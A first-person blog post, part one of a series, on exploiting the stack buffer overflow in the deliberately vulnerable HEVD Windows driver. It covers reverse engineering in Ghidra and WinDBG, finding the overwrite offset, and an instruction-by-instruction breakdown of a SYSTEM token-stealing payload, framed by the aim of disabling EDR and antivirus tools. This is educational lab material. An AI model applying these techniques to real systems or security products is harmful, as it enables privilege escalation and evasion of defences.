One ring (zero) to rule them all.

Part 1

19 min readMay 24, 2020

Introduction

Endpoint Detection and Response (EDR) is starting to rear its head in more and more environments, constraining and making post exploitation activities more difficult for operators. Sure there are tricks and techniques to avoid these defenses, but unless you’ve had experience or have access to an agent, the chance of being detected grows significantly.

Rather than being forced to walk on egg shells, I want an approach that will allow me to take back control and be in a position to operate without constraints once administrative access is obtained on a system. I essentially want a blanket approach to dealing with these technologies on an on going basis.

I believe the answer to this problem awaits in kernel land, where the core functionality of EDR technology is rooted. From what I’ve seen on the Twitters I don’t think I’m the only person with this train of thought either. I expect over the next year or two, we will see kernel land shenanigans become more mainstream and no longer just Techniques, Tactics and Procedures (TTPs) of APTs and advanced red teams.

Just as advances in defending against malicious PowerShell have pushed operators to C#, I believe operators will naturally be pushed into kernel land to deal with EDR. I expect this is already being done, but it is not in the public space yet (unless I’ve missed it).

A good example of using ring 0 shenanigans for defense evasion has already been published publicly in Batsec’s (https://twitter.com/_batsec_) Ghost in the Logs research, where he discusses universally evading Sysmon and ETW.

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

To start exploring a possible solution to the problem, I have some knowledge and skills to develop first.

In the hope of getting on the ring 0 train before it leaves the station, I’ve decided to spend the next couple of months delving into kernel land. Once I’m comfortable with my understanding, I’ll move into researching the abuse of driver vulnerabilities to execute code in kernel land, which can subsquently be used to bypass and/or disable the functionality of EDR and AV solutions. I’m also hoping to pickup a better understanding of C++, with which I’m a noob.

Plan of Attack

To get the ball rolling, I’ve decided that I’m going to work through each of the vulnerabilities that have been deliberately engineered into the HackSys Extreme Vulnerable Driver (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver). From the blogs I’ve seen written about this driver, it seems this path is well trodden by those giants whose shoulders many of us stand upon.

So what follows, will be detailed blog posts of my journey through each of these vulnerabilities. I find huge learning benefits, in “reporting” my steps during an exercise, as it forces me to justify my understanding rather then glaze over details.

While I did initially reference the HEVD source code when working through this exercise, I want to focus on working through the remainder of the exercises without source code. Instead, relying on reverse engineering to locate vulnerabilities and craft exploits.

This blog post will cover HEVD’s buffer overflow vulnerability.

As always, thanks @woolfordphilip for reading over the blog and providing advice.

Given that this blog post is a bit of a read, I’ve broken it into sections so you can skip to the components you are most interested in.

Setup: A high level overview of the components you need to play along from home.
Reverse Engineering the Driver: The steps I followed to reverse engineer the driver with Ghidra to locate the vulnerability and establish a method of abuse.
Understanding the Shellcode: A breakdown of each instruction that makes up one of the payloads provided in the HEVD project.
Generating the Shellcode: A small section showing the generation of shellcode with a Metasploit tool.
Polishing the Exploit: Incorporation of the shellcode into the POC, to develop a working exploit.
SYSTEM Sh3llz!!1!!!!11!!!: Concluding section.

Setup

To repeat the exact steps I walk through, you will need the following:

Virtual Box
2 Windows 7 VMs (1 for debugging and 1 for a ̶v̶i̶c̶t̶i̶m̶ debuggee)
A system with Ghidra installed (I installed it on a Kali VM)
WinDBG installed on both (Really only need it on the Debugging machine, but it comes in handy sometimes on the debuggee)
The vulnerable driver: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
OSR’s tool to load and register the driver: http://www.osronline.com/article.cfm%5Earticle=157.htm
Visual Studio to develop exploit code in C++

I’m not going to touch a step by step guide to setting up the environment, there are plenty of good resources available:

Reverse Engineering the Driver

Once the environment was setup, I kicked off by opening the driver (HEVD.sys) in Ghidra and selecting the option to auto analyze.

Much like portable executables, drivers also have ‘entry points’. This is where I began my analysis.

The assembly instructions of the driver’s entry point.

To start with, I took note of the IoCreateDevice and IoDeleteDevice functions and started renaming the variables based on their documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatedevice and https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iodeletedevice).

Decompiled driver entry point with renamed variables.

The next step I took, was to establish what the offsets of the DriverObject variable represented. I started by reviewing Microsoft’s documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_driver_object), which has a clear definition of a _DRIVER_OBJECT structure but does not detail the offsets of its members. While you could probably calculate these offsets based on the size of each contained type, it is much easier to fire up WinDBG on one of the Windows 7 VMs and run the dt (display type) function which details the structure and the offsets of members.

dt function to display _DRIVER_OBJECT offsets.

The results of this command indicate all of the offsets we are interested in, must be elements of the MajorFunction Ptr32 array, except for the offset of 0x34 which is the DriverUnload member. The Microsoft documentation defines the MajorFunction array as:

A dispatch table consisting of an array of entry points for the driver's DispatchXxx routines. The array's index values are the IRP_MJ_XXX values representing each IRP major function code.

So this member, is an array of pointers to dispatch routines (functions) that the driver uses to handle I/O Request Packets (IRPs). These IRPs, from a high level, can be thought of as requests sent from user land for the driver to act upon. I found that the following website describes both the structure of the _DRIVER_OBJECT type and the elements (IRP Handlers) of the MajorFunction array:

https://www.aldeid.com/wiki/DRIVER_OBJECT

IRP_MJ_CREATE                   0x00
IRP_MJ_CREATE_NAMED_PIPE        0x01
IRP_MJ_CLOSE                    0x02
IRP_MJ_READ                     0x03
IRP_MJ_WRITE                    0x04
IRP_MJ_QUERY_INFORMATION        0x05
IRP_MJ_SET_INFORMATION          0x06
IRP_MJ_QUERY_EA                 0x07
IRP_MJ_SET_EA                   0x08
IRP_MJ_FLUSH_BUFFERS            0x09
IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
IRP_MJ_SET_VOLUME_INFORMATION   0x0b
IRP_MJ_DIRECTORY_CONTROL        0x0c
IRP_MJ_FILE_SYSTEM_CONTROL      0x0d
IRP_MJ_DEVICE_CONTROL           0x0e
IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f
IRP_MJ_SHUTDOWN                 0x10
IRP_MJ_LOCK_CONTROL             0x11
IRP_MJ_CLEANUP                  0x12
IRP_MJ_CREATE_MAILSLOT          0x13
IRP_MJ_QUERY_SECURITY           0x14
IRP_MJ_SET_SECURITY             0x15
IRP_MJ_POWER                    0x16
IRP_MJ_SYSTEM_CONTROL           0x17
IRP_MJ_DEVICE_CHANGE            0x18
IRP_MJ_QUERY_QUOTA              0x19
IRP_MJ_SET_QUOTA                0x1a
IRP_MJ_PNP                      0x1b
IRP_MJ_PNP_POWER                IRP_MJ_PNP
IRP_MJ_MAXIMUM_FUNCTION         0x1b

Performing some calculations we can derive the IRP handlers the driver is registering. In this case I used comments to label each of the handlers being registered by the driver. With these changes the disassembled code started to look much nicer.

Driver entry point with renamed variable and comments for labels.

The registered function for the IRP_MJ_DEVICE_CONTROL element is of interest to us. This is the function that will handle IO control codes (IOCTLS) sent from user land. From a high level, these can be thought of as messages sent from user land which may include input and output data buffers for the driver to read from, process and write results to.

Reading the strings used in the DbgPrintEx function, it is obvious which function we want to explore further. Looking at this function, it does not appear to use any dangerous functions. However, it seems to be calling another function after some form of validation.

Function that seems to be a wrapper for another function.

Analyzing the function being called after the validation, it appears the called function uses the memcpy function, without performing any further validation checks. This looks like the perfect candidate for a saved return pointer buffer overflow. After renaming variables used in this function and those that are passed as arguments, this assumption is further strengthened.

It appears the memcpy function, is copying an amount of bytes, specified as an argument of the function. The bytes to be copied, are specified as another argument of the function. These bytes are then copied into a local buffer with a size of 2060 bytes.

If we can work out a way to control both of these inputs, we should be able to exploit this vulnerability.

Jumping back to the function that calls “BufferOverflow”, we can start to rename variables and make sense of the validation check.

The “CallBufferOverflow” function validates whether the value stored at param_2, at an offset of 0x10 is a valid pointer. If it is valid, the function calls CallBufferOverflow with the pointer as the first argument and value at an offset 0x8 from param_2, as the size_t argument.

Taking another step back, lets have a second pass at making sense of the IRP_MJ_DEVICE_CONTROL function. We established in a previous step that the IRP_MJ_DEVICE_CONTROL function is dispatch routine initialized by the driver. The Microsoft documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nc-wdm-driver_dispatch) details the definition of dispatch routines. We can use this definition to rename the variables passed into the IRP_MJ_DEVICE_CONTROL function.

NTSTATUS DriverDispatch(
  _DEVICE_OBJECT *DeviceObject,
  _IRP *Irp
)

Renamed IRP_MJ_DEVICE_CONTROL arguments.

To work out what the iVar1 variable represents, we need to look at the type definition of the _IRP struct and what member is located at an offset of 0x60. The results of WinDBG’s display type function indicate that this offset is located in the Tail member of the _IRP struct.

Using WinDBG to display _IRP’s structure.

Running the display type function again, but this time passing it the -r flag (recursively dump subtype fields), we get a look at the Tail structure’s members as well.

Using WinDBG to display _IRP’s structure in addition to the structure of members.

At offset 0x60, is a member CurrentStackLocation. We can now rename the iVar1 variable, to reflect this member.

The last piece of the puzzle for this function, is to work out what value is represented at an offset of 0xc of CurrentStackLocation.

Microsoft’s documentation (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_irp) states that the CurrentStackLocation is of a IO_STACK_LOCATION type. The results of WinDBG’s display type function on this structure indicates that the value represented by CurrentStackLocation is the IoControlCode member of IO_STACK_LOCATION’s Parameter member.

Results of WinDBG’s display type for IO_STACK_LOCATION.

This information is enough to make sense of the parts of the IRP_MJ_DEVICE_CONTROL function we are interested in. We can conclude that, if the HEVD driver receives an IRP with a control code of 0x222003, the CallBufferOverflow function gets called with the arguments Irp and CurrentStackLocation.

Revisiting the CallBufferOverflow function, we can rename the arguments of the function in addition to establishing exactly what is being passed to the BufferOverflow function when it is called.

We can see that the the first argument of BufferOverflow is a buffer pointer located at an offset of 0x10 from the CurrentStackLocation struct. Reviewing the output of the previous WinDBG display type results for IO_STACK_LOCATION structure, we find that this offset must be the Type3InputBuffer member of the IO_STACK_LOCATION’s DeviceIOControl member.

Microsoft’s documentation states that the Type3InputBuffer is the input buffer provided in a device control IRP. This looks good for us, we have control of the input buffer which is copied from, in the BufferOverflow function.

The next step is to work out if the second argument to the BufferOverflow function is also controllable. To establish what the offset of 0x8 of the IO_STRUCT_LOCATION struct represents, we can revisit WinDBG’s display type results again. These results indicate that this offset represents the input buffer size for device control IRPs.

Excellent, we can control both of these values from user land. We have the information required to start creating a proof of concept exploit.

Developing an Exploit in C++

In comparison to the previous section, the exploit development will be more high level. I don’t have a whole lot of experience in C++, so buyer beware when reusing my code snippets. I’ve also deliberately used screenshots of the code rather than snippets, in an attempt to push anyone who follows into writing their own code.

Based on the results of the exploration conducted in the previous section, we know that we need to develop code which sends a malicious device control IRP. To exploit the vulnerable memcpy function, this IRP needs to contain a buffer with a size large enough to overwrite the saved return pointer

To achieve this I started by writing a C++ wrapper which obtains a handle to the HEVD driver and sends it a device control IRP with an IO control code of 0x222003 and contents which don’t trigger the exploit.

I didn’t want a huge main function so I wrote wrappers for the core components of the exploit.

Obtain Driver Handle

This function calls the Window’s CreateFileA (https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) function to obtain a handle to the HEVD driver which is then returned.

Allocate a Buffer

This function allocates a buffer of a specified length and populates it with ‘0x42’ bytes and returns a pointer to the this buffer.

Send IOCTL

This function crafts a device control IRP and sends it to the driver to be processed.

Main

Combines the functions to interact with the driver.

Testing the Wrapper

To validate my understanding of the driver’s functionality and my POC code, I used WinDBG to set a break point on the CallBufferOverflow function before running my executable.

To establish the memory address where I needed to set the break point, I referenced the address of the assembly instruction that calls the CallBufferOverflow function in Ghidra. This instruction is located at the memory address 0x004440b5.

Memory address of the assembly instruction which calls CallBufferOverflow.

To account for ASLR, we have to calculate the difference between this memory address and the base of the HEVD.sys image, which is 0x400000.

Based on this calculation, we can expect that the call CallBufferOverflow assembly instruction will be located at an offset of 0x440b5, from the base of the HEVD driver in memory.

Using WinDBG’s list loaded modules function, we can establish where the HEVD driver has been loaded into memory on the debugee VM and then calculate the expected location of the assembly instruction which calls CallBufferOverflow.

WinDbg’s unassemble instruction to verify calculation.

Using WinDbg’s unassemble function, we can verify that are calculation is correct before setting a break point.

Hitting the break point which validates calculations and functionality of the code.

Running the executable and hitting the break point verifies our calculations are correct and that our code is behaving as expected.

Triggering the Vulnerability

Next, we can move onto actually triggering the vulnerability. To do this, we simply need to increase the size of the buffer which is copied from, to a size which we expect to overwrite the saved return pointer of the CallBufferOverflow function.

By adjusting the code, recompiling it and running the resulting executable, we can expect to cause a crash if we’ve successfully managed to trigger the vulnerability.

As expected, running the vulnerability results in an access violation, verifying that we can indeed overwrite the saved return pointer with a value in our buffer.

Crash caused by saved return pointer buffer overflow.

Calculating EIP offset

After confirming that the vulnerability can be triggered, we next need to confirm and calculate which part of the buffer is actually overwriting the saved return pointer.

To establish what offset is responsible for the overwrite, I generated a cyclic pattern with Metasploit’s pattern_create.rb script to replace the previousy used ‘0x42’s.

I also added a function to my code, to read a text file containing the cyclic pattern from disk and copy it into a specified buffer.

Function to populate a buffer with the contents of a file.

After updating my main function to make use of GetPayload, I rebuilt and ran the fresh executable, causing another crash.

Overwriting the saved return pointer with the cyclic pattern.

This crash was the result of an access violation while trying to execute the code at memory address 0x72433372. Metasploit’s pattern_offset.rb script was then used to calculate that the bytes of the buffer which overwrite the saved return pointer, are located at on offset of 2080 bytes into the buffer.

To verify that the calculated offset is correct, I updated my main function to set the 4 bytes located at the offset with ‘0x2a’.

If the calculation is correct, we expect a memory access violation at 0x2a2a2a2a after compiling and running the fresh executable.

Excellent! We’ve confirmed that we are able to control the value which overwrites the saved return pointer.

Understanding the Shellcode

Now we can control the flow of execution, we need a payload to run once the driver’s execution flow is hijacked.

The HEVD Github repository includes a payload (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c) which will overwrite the token of our process, with a token from a process running as SYSTEM. This elevates the privilege of our process from an unprivileged user, to the context of the SYSTEM acocunt.

Token stealing payload — https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c

Before we can convert this payload into shellcode, we need to understand exactly what it is doing, and what the offsets represent.

To get an understand of the purpose of each referenced struct, and what each represented, I frequently referenced the following sites which detail and describe kernel structures:

PUSHAD & XOR EAX, EAX

The first two instructions are simple. The PUSHAD command is saving the state of the registers and the XOR instruction which follows is setting the EAX register to 0.

MOV EAX, FS:[EAX + KTHREAD_OFFSET]

The next instruction is a little more complicated. We can see that the instruction is coping the value pointed to by fs:[eax + KTHREAD_OFFSET] into the EAX register. The ‘fs’ is referring to a register which in 32 bit versions of Windows, is aligned with the Kernel Processing Control Region (KPCR). The KPCR contains information about the current processor.

Using WinDBG, we can analyze the offsets of the KPCR structure with the display type function. The results of this command indicate that the offset mentioned in the comment lies within the PrcbData member which is a _KPRCB (Kernel Processing Control Block) structure.

Analyzing the the _KPRCB structure with Windbg, we find that the offset mentioned in the comments of the payload, refers to the CurrentThread member which is a pointer to a _KTHREAD structure.

So we can establish that this instruction is saving a pointer to the _KTHREAD structure which contains information about the current thread.

MOV EAX, [EAX + EPROCESS_OFFSET]

The next instruction is moving the value stored at the EPROCESS_OFFSET which the comment suggests is a sub member of the _KPROCESS structure. Using WinDBG, we can unwind the members to establish what exactly is being referenced and what its offset is.

The _KTHREAD member, ApcState is a _KAPC_STATE structure, which is used to track Asynchronous Procedure Calls (APCs) which have been queued to the thread when it attaches to another process.

Using WinDBG to display the members of the _KAPC_STATE structure, we can see that the member referenced in the comments, Process, is a _KPROCESS structure.

However, the comment in the payload references an EPROCESS structure. Using WinDbg to display the structure definition of _EPROCESS, we see it contains an _KPROCESS member at offset 0x0.

So while the value of _KTHREAD.ApcState.Process references a _KPROCESS structure, it is also a reference for the _EPROCESS structure which contains _KPROCESS.

This is important to know, because an _EPROCESS structure is what the kernel uses to represent a process. So from this information, we can establish that this instruction is actually used to obtain a pointer to the _EPROCESS structure which is the kernels representation of the current process.

MOV ECX, EAX

The next instruction is simple, it is just saving a pointer to the _EPROCESS structure which represents the current process.

MOV EDX, 0x4

This instruction is moving 0x4 into EDX, which the comment suggests is the PID of the System process. Using a PowerShell one-liner we can confirm this is the case.

The System process has a process id of 4.

This is actually consistent for all Windows 7 operating systems. The System process always has a process id of 4.

SearchSystemPID: MOV EAX, [EAX + FLINKOFFSET]

The following instruction, is the first instruction of the SearchSystemPID routine. This instruction is saving the value of a sub member of the current process’s _EPROCESS structure.

Unwinding the members of the _EPROCESS struct we find that the ActiveProcessLinks member is a _LIST_ENTRY struct, which is a doubly linked list.

The ActiveProcessLinks doubly linked list, contains pointers to the processes currently running on the system. The Flink member references the next process in the list’s ActiveProcessLinks member and the Blink member references the previous process in the list’s ActiveProcessLinks member.

We can establish that this instruction is saving a pointer to the ActiveProcessLinks structure of the next process in the list.

SearchSystemPID: SUB EAX, FLINK_OFFSET

This instruction is reasonably straight forward, it is subtracting the offset of the ActiveProcessLinks member to obtain a pointer to the memory location of _EPROCESS sturcture, for which it is a member of.

SearchSystemPID: CMP [EAX + PID_OFFSET], EDX

The next instruction is making a comparison between the value stored in EDX (The process id of the System process) and a member of the _EPROCESS structure.

Reviewing the structure of the _EPROCESS struct again, we can establish that this instruction is validating whether the current process referenced by EAX has a process id of 0x4, which would make it the System process.

SearchSystemPID: JNE SearchSystemPID

The final instruction of the routine returns code execution to the beginning, if the _EROCESS structure currently referenced by EAX does not represent the System process.

We can establish that the function of this routine is to continuously parse the _EPROCESS structures until the EAX register references the _EPROCESS structure of the System process.

MOV EDX, [EAX + TOKEN_OFFSET]

This instruction is copying the value referenced at an offset of the System _EPROCESS structure into the EDX register.

To find the offset, we can reference the type definition of the _EPROCESS structure again.

The Token member of the _EPROCESS structure is a pointer to a _TOKEN structure which describes the security context of the process.

MOV [ECX + TOKEN_OFFSET], EDX

This instruction is copying the pointer for the System process’ _TOKEN structure (stored in EDX) over the top of the pointer which references the current process’ (referenced by the ECX register) _TOKEN structure.

POPAD

Another simple instruction, POPAD returns the registers to the state they were in before the payload’s token nabbing antics.

A Graceful Exit

While the registers are back to the state they were at before hijacking the flow of execution, we need to hand back execution to the driver in a manner which will not cause a crash.

To achieve this we need to replicate the assembly instructions of the calling function (CallBufferOverflow) of BufferOverflow, which we hijacked by overwriting the saved return pointer. We can find these instructions by referencing the results of Ghidra’s earlier analysis.

Assembly instructions of the CallBufferOverflow function.

We can see 4 assembly instructions that are executed after code execution is returned to CallBufferOverflow from the BufferOverflow function, before it returns execution to its calling function, IRP_MJ_DEVICE_CONTROL:

MOV int0 , EAX
MOV EAX, int0
POP EBP
RET 0x8

Based on the decompiled assembly of the BufferOverflow and CallBufferOverflowfunction, we can see that BufferOverflow always returns a value of 0 which is then subsequently returned by the CallBufferOverflow function.

So we can actually simplify the outstanding instructions of the CallBufferflow function and still smoothly return execution to the driver:

XOR EAX, EAX
POP EBP
RET  8

Generating the Shellcode

Based on my understanding of the shellcode and the values of offsets obtained in the previous section’s exploration, I used Metasploit’s nasm_shell.rb script to generate the bytes which represent the assembly instructions required for the payload.

Shellcode generated with Metasploit’s nasm_shell.rb script.

Polishing the Exploit

To complete the exploit code I added a char array containing my shellcode and removed the memset function I was using to the overwrite the portion of the buffer to ‘0x2a’ bytes. I replaced the memset function with a memcpy function call, which sets the overwrite portion of the buffer, to the memory address of my shellcode.